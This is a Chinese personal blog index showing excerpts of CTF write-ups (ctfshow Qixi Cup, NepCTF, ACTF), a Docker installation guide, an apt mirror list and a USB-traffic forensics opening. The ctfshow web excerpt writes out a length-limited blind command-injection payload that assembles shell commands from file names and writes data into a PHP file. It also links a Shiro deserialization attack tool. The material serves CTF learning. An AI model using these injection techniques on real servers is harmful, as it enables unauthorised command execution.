shenghuo2's Blog
人生得意须尽欢 莫使金樽空对月
本站所写仅表示个人拙见,如有不当多多担待
ctfshow七夕杯WP 这次比赛在最后掉出了前十 错过了奖品 挺可惜的 下次再接再厉 web web签到限制长度无回显命令执行 https://xz.aliyun.com/t/2748#toc-4 我弹了半天shell发现弹不出来 然后构造的不出网命令执行 ls echo "Lw=="|base64 -d>1.php 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 >php >1.\\ >\>\\ >-d\`\\ >\ \\ >64\\ >base\\ >\"\|\\ >Lw==\\ >\ \"\\ >echo\\ >\ \`\\ >ls\\ ls -t>_ sh _ 1 bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var head echo "L2ZsYWc="|base64 -d>1.php 1 2 3
NepCTF 2022 wp misc 花花画画画花花 Author: β-AS 花花画了一张图,你能看出来她画的是什么吗 (flag格式为NepCTF{}) 解压得到一个osu!的谱面 人太菜打不过() 导入osu开个不会fail的模式读谱即可 对着回放打的 签到题 Author: limu 极限套娃 flag格式为nepctf{} 换过压缩包之后就有思路了 解压缩包套娃 没有密码 参考贝塔
misc mahjoong就打开自动对战 挂着就行 胜利就有flag 1 ACTF{y@kumAn_1s_incredl3le} emojiemoji进行base100解密 得到一串0和1 转成hex 1 4e696e3649355f6353316d 然后转成字符串 1 Nin6I5_cS1m 倒序再包上ACTF{} 1 ACTF{m1Sc_5I6niN} web babyshiroshiro反序列化漏洞命令执行 直接上工具就行 https://github.com/j1anFen/shiro_attack re crackmeIDA反编译 先对输入的数据8位一组存进内存 i
利用阿里云镜像在ubuntu上安装Docker 先换源换清华源 然后更新捏 安装docker 先更新到最新的软件版本 1 apt-get update 安装系统工具 1 apt-get -y install apt-transport-https ca-certificates curl software-properties-common 安装gpg证书 1 curl -fsSL https://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | apt-key add - 写入阿里云镜像源地址 1 add-apt-repository "deb [arch=amd64] https://mirrors.aliyun.com/docker-ce/linux/ubuntu $(lsb_release -cs) stable" 再一次更新 1 apt-get -y update 安装docker 1 apt-get -y install docker-ce 测试docker是否正常启动 1 docker ps -a 修改dock
# 默认注释了源码镜像以提高 apt update 速度,如有需要可自行取消注释 deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ focal main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ focal main restricted universe multiverse deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ focal-updates main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ focal-updates main restricted universe multiverse deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ focal-backports main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ focal-backports main restricted universe multiverse deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ focal-security main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ focal-security main restricted universe multiverse # 预发布软件源,不建议启用 # deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ focal-proposed main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ focal-proposed main restricted universe multiverse
MISC 问卷调查填写问卷得到flag ez_usb键盘流量提取 有三组流量 其中IP为2.4.1的流量没用 分别提取2.8.1和2.10.1的流量 1 2 tshark -r ez_usb.pcapng -T fields -e usbhid.data -Y "usb.device_address == 8"> 281.txt tshark -r ez_usb.pcapng -T fields -e usbhid.data -Y "usb.device_address == 10"> 2101.txt 然后用脚本转换 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 import os,sys normalKeys = { "04":"a",
